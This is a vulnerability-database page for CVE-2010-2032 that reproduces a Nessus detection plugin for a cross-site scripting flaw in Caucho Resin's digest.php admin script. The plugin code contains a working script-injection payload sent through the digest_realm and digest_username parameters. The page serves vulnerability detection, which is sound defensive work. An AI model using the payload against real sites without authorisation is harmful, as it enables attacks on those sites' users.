Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nessusThis script is Copyright (C) 2010-2021 Tenable Network Security, Inc.RESIN_DIGEST_XSS.NASL
HistoryMay 21, 2010 - 12:00 a.m.

Resin resin-admin/digest.php XSS

2010-05-2100:00:00
This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.
www.tenable.com
35

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

EPSS

0.007

Percentile

81.2%

JSON

The remote host is running Resin, an application server.

The ‘resin-admin/digest.php’ script included with the version of Resin listening on the remote host fails to sanitize user input to the ‘digest_realm’ and/or ‘digest_username’ parameters before using it to generate dynamic HTML output.

An attacker may be able to leverage this issue to inject arbitrary HTML or script code into a user’s browser to be executed within the security context of the affected site.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#


include('deprecated_nasl_level.inc');
include('compat.inc');


if (description)
{
  script_id(46693);
  script_version("1.16");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");

  script_cve_id("CVE-2010-2032");
  script_bugtraq_id(40251);

  script_name(english:"Resin resin-admin/digest.php XSS");
  script_summary(english:"Tries to inject script code via digest.php");

  script_set_attribute(
    attribute:"synopsis",
    value:
"The remote web server hosts a PHP script that is prone to cross-site
scripting attacks."
  );
  script_set_attribute(
    attribute:"description",
    value:
"The remote host is running Resin, an application server.

The 'resin-admin/digest.php' script included with the version of Resin
listening on the remote host fails to sanitize user input to the
'digest_realm' and/or 'digest_username' parameters before using it to
generate dynamic HTML output.

An attacker may be able to leverage this issue to inject arbitrary
HTML or script code into a user's browser to be executed within the
security context of the affected site."
  );
  script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/511341/30/0/threaded");
  script_set_attribute(attribute:"solution", value:"Unknown at this time.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");
 script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);

  script_set_attribute(attribute:"vuln_publication_date", value:"2010/05/18");
  script_set_attribute(attribute:"plugin_publication_date", value:"2010/05/21");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:caucho:resin");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses : XSS");

  script_copyright(english:"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 8080);
  script_require_keys("www/resin");

  exit(0);
}


include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("url_func.inc");


port = get_http_port(default:8080);


# Unless we're paranoid, make sure the banner is from Resin.
if (report_paranoia < 2)
{
  banner = get_http_banner(port:port);
  if (!banner) exit(1, "Unable to get the banner from web server on port "+port+".");
  if ("Resin" >!< banner) exit(1, "The web server on port "+port+" does not appear to be Resin.");
}


# Try to exploit the issues.
alert = string('">', "<script>alert('", SCRIPT_NAME, "')</script>");
cgi = '/digest.php';
dirs = make_list('resin-admin');

vuln = test_cgi_xss(
  port     : port,
  cgi      : cgi,
  dirs     : dirs,
  qs       : 'digest_attempt=1&digest_realm='+urlencode(str:alert)+'&digest_username[]=',
  pass_str : 'input name="digest_realm" size="50" value="'+alert,
  pass2_re : "<title>Resin Admin Login"
);
if (!vuln)
{
  vuln = test_cgi_xss(
    port     : port,
    cgi      : cgi,
    dirs     : dirs,
    qs       : 'digest_attempt=1&digest_username='+urlencode(str:alert),
    pass_str : 'input name="digest_username" size="50" value="'+alert,
    pass2_re : "<title>Resin Admin Login"
  );
}
if (!vuln) exit(0, "No vulnerable installs of Resin were discovered on the web server on port "+port+".");

Related

prion 1
exploitdb 1
cve 1
nvd 1
openvas 2
seebug 1
cvelist 1
prion
prion
Cross site scripting
2010-05-24 19:30:00
exploitdb
exploitdb
Caucho Resin Professional 3.1.5 - &#039;/resin-admin/digest.php&#039; Multiple Cross-Site Scripting Vulnerabilities
2010-05-19 00:00:00
cve
cve
CVE-2010-2032
2010-05-24 19:30:01
nvd
nvd
CVE-2010-2032
2010-05-24 19:30:01
openvas
openvas
Caucho Resin < 4.0.7 Multiple XSS Vulnerabilities - Active Check
2010-05-28 00:00:00
Caucho Resin Multiple Cross-Site Scripting Vulnerabilities
2010-05-28 00:00:00
seebug
seebug
Caucho Resin Professional 3.1.5 - 'resin-admin/digest.php' Multiple Cross-Site Scripting Vulnerabili
2015-08-31 00:00:00
cvelist
cvelist
CVE-2010-2032
2010-05-24 19:00:00

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

EPSS

0.007

Percentile

81.2%

JSON
Related for RESIN_DIGEST_XSS.NASL
prion1exploitdb1cve1nvd1openvas2seebug1cvelist1